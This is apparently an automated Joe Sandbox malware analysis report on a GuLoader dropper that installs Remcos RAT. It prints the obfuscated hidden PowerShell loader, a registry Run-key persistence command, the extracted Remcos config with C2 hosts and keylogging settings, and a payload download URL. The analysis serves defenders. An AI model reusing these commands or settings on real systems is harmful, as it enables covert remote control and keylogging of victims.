Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-USC-22USC-KonchoCo.exe

Overview

General Information

Sample name:PO-USC-22USC-KonchoCo.exe
Analysis ID:1435466
MD5:cbfe477536e5434005ec40a22c8b79ee
SHA1:2fb42b99bb51041bbbe2da96125aeb95ec1b4c02
SHA256:88079d533879c31b99a435c152016333280e0290b80f8f3afbb28f2ccbc4b246
Tags:exe
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Obfuscated command line found
Powershell drops PE file
Sample uses process hollowing technique
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • PO-USC-22USC-KonchoCo.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe" MD5: CBFE477536E5434005EC40A22C8B79EE)
    • powershell.exe (PID: 7764 cmdline: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7908 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 7188 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • cmd.exe (PID: 4940 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 2792 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wab.exe (PID: 3872 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2024 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2112 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5368 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2032 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2324 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4812 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2148 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3128 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4624 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2920 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3524 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3344 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3588 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5292 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5268 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 1808 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2332 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8092 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5168 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3888 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5196 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2816 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 1664 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3604 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5820 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2756 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2932 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5796 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3940 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 1344 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 1856 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2656 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "learfo55ozj02.duckdns.org:29871:0learfo55ozj02.duckdns.org:29872:1leirfo45ozj01.duckdns.org:29871:0", "Assigned name": "Tops", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "jmofvnb-6GMGJI", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "fvberms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\fvberms.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000001.00000002.3490629462.000000000C710000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: wab.exe PID: 7188JoeSecurity_RemcosYara detected Remcos RATJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7188, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", ProcessId: 4940, ProcessName: cmd.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2792, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Insecta
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4940, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", ProcessId: 2792, ProcessName: reg.exe
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7764, TargetFilename: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7764, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 7908, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7188, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", ProcessId: 4940, ProcessName: cmd.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)", CommandLine: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe", ParentImage: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe, ParentProcessId: 7680, ParentProcessName: PO-USC-22USC-KonchoCo.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)", ProcessId: 7764, ProcessName: powershell.exe
              Timestamp:05/02/24-19:02:32.592137
              SID:2032777
              Source Port:29871
              Destination Port:49740
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/02/24-19:02:02.070800
              SID:2032776
              Source Port:49740
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "learfo55ozj02.duckdns.org:29871:0learfo55ozj02.duckdns.org:29872:1leirfo45ozj01.duckdns.org:29871:0", "Assigned name": "Tops", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "jmofvnb-6GMGJI", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "fvberms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exeReversingLabs: Detection: 15%
              Source: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exeVirustotal: Detection: 11%Perma Link
              Source: PO-USC-22USC-KonchoCo.exeReversingLabs: Detection: 15%
              Source: PO-USC-22USC-KonchoCo.exeVirustotal: Detection: 11%Perma Link
              Source: Yara matchFile source: 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7188, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED
              Source: PO-USC-22USC-KonchoCo.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.45.139:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: PO-USC-22USC-KonchoCo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.3487057946.0000000006FBD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.3490237791.00000000080E0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

              Networking

              barindex
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49740 -> 193.222.96.21:29871
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 193.222.96.21:29871 -> 192.168.2.4:49740
              Source: Malware configuration extractorURLs: learfo55ozj02.duckdns.org
              Source: global trafficTCP traffic: 193.222.96.21 ports 29871,1,2,7,8,9
              Source: unknownDNS query: name: learfo55ozj02.duckdns.org
              Source: unknownDNS query: name: leirfo45ozj01.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.4:49740 -> 193.222.96.21:29871
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewIP Address: 193.222.96.21 193.222.96.21
              Source: Joe Sandbox ViewASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /XpMumnKrmZynRk242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: enelltd.topCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
